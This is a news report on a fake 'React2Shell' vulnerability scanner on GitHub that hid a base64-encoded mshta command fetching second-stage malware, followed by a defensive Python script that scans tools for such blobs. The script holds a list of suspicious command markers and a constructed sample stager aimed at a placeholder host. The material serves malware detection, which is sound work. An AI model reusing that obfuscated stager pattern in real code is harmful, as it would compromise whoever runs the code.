A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also known as "React2Shell," was found to be malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports.
Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware.
A look at the script confirms the warning. The malware was embedded inside react2shellpy.py, where a block of base64-encoded strings was decoded into a PowerShell command.
The malware targeted Windows devices by using mshta.exe, a legitimate Windows tool often abused to run malicious scripts, pointing it at a malicious custom script hosted on GitHub. The script appeared to execute without prompting the user or raising suspicion.
The scanner was aimed at security professionals investigating CVE-2025-55182 and was presented as something helpful rather than harmful. By posing as a legitimate security utility, it turned normal research activity into an entry point for compromise, putting cybersecurity researchers at risk.
It is worth noting that this came just days after reports showed hackers hiding new PyStoreRAT malware inside utility tools on GitHub, specifically targeting OSINT and cybersecurity researchers.
While GitHub acted quickly and removed the repository, the incident goes to show that code shared under the banner of cybersecurity tools should be reviewed with caution. Simply put, no tool should be trusted blindly just because it is hosted on a well-known platform.
Saurabh's full warning can be found here. He urged security professionals to review source code thoroughly before executing any third-party tools, especially those claiming to help with vulnerability detection.
While the malicious script has been taken down, cached copies or forks may still circulate. Researchers analysing CVE-2025-55182 or similar high-interest vulnerabilities should stay alert for fake exploit tools, especially those with obfuscated code, network callbacks or unclear authorship.
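The pattern described above, a block of base64 literals that is reassembled and decoded into an mshta or PowerShell command, is easy to triage statically before running a downloaded tool. The following script is an added example and is not code from the article or from the React2shell-scanner repository: it parses a Python file with the standard `ast` module, collects string literals (and lists or tuples of literals that an obfuscator would join back together), base64-decodes anything that looks like base64, and flags decoded text that names a LOLBin, a download cmdlet or a URL. The sample "tool" it scans is constructed inline and its decoded command points at the placeholder host placeholder.invalid; the marker list is illustrative, not exhaustive.

```python
"""Static triage of a third-party Python tool before executing it.

Added example (not the article's or the repository's code). Looks for
base64 blobs that decode into commands naming LOLBins, downloaders or
URLs, the technique the article describes. The sample input is constructed.
"""
import ast
import base64
import binascii
import re
from typing import Iterator, List, Optional, Tuple

# Illustrative markers a reviewer wants to see in a decoded literal.
SUSPICIOUS_MARKERS = (
    "mshta", "powershell", "-enc", "iex", "invoke-expression",
    "downloadstring", "http://", "https://", "rundll32", "certutil",
)
# Base64 alphabet, at least 16 characters, optional padding.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def try_decode(blob: str) -> Optional[str]:
    """Return mostly-printable text if blob is valid base64, else None."""
    blob = blob.strip()
    if not BASE64_RE.match(blob):
        return None
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="ignore")
    # Obfuscated commands decode to readable text; binary noise does not.
    if not text or sum(c.isprintable() for c in text) / len(text) < 0.9:
        return None
    return text


def _string_pieces(tree: ast.AST) -> Iterator[Tuple[int, str]]:
    """Yield (lineno, literal) for string constants, plus the joined form of
    lists/tuples made entirely of string constants (split-and-join blobs)."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.lineno, node.value
        elif isinstance(node, (ast.List, ast.Tuple)) and node.elts and all(
            isinstance(e, ast.Constant) and isinstance(e.value, str)
            for e in node.elts
        ):
            yield node.lineno, "".join(e.value for e in node.elts)


def scan_source(source: str) -> List[dict]:
    """Return one finding per literal whose plain or decoded text hits a marker."""
    findings = []
    for lineno, literal in _string_pieces(ast.parse(source)):
        for candidate in (literal, try_decode(literal)):
            if candidate is None:
                continue
            lowered = candidate.lower()
            hits = [m for m in SUSPICIOUS_MARKERS if m in lowered]
            if hits:
                findings.append({
                    "line": lineno,
                    "encoded": candidate is not literal,
                    "markers": hits,
                    "preview": candidate[:60],
                })
    return findings


# Constructed sample standing in for a "scanner" that hides a stager.
# The hidden command is built here so the base64 is correct; it targets
# an invalid placeholder host and is never executed by this script.
_HIDDEN = base64.b64encode(b"mshta https://placeholder.invalid/stage2.hta").decode()
_CHUNKS = [_HIDDEN[i:i + 12] for i in range(0, len(_HIDDEN), 12)]

SAMPLE_TOOL = f'''
import base64, subprocess

def check_target(host):
    return "checking " + host + " for CVE-2025-55182"

_P = {_CHUNKS!r}
subprocess.Popen(base64.b64decode("".join(_P)).decode(), shell=True)
'''


if __name__ == "__main__":
    import sys
    # Usage: python triage.py tool.py [more.py ...]; with no args, scans the sample.
    sources = [(p, open(p, encoding="utf-8").read()) for p in sys.argv[1:]] \
        or [("<sample>", SAMPLE_TOOL)]
    for name, src in sources:
        for f in scan_source(src):
            kind = "base64-decoded" if f["encoded"] else "plain"
            print(f"{name}:{f['line']}: {kind} literal hits {f['markers']}: {f['preview']!r}")
```

Individual 12-character chunks fall below the 16-character minimum and are not decoded on their own; only the reassembled list is, which is why split-and-join obfuscation still produces a single finding. A hit is a prompt to read the code by hand, not a verdict: legitimate scanners contain URLs too, so the finding reports the decoded preview rather than deciding for you.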

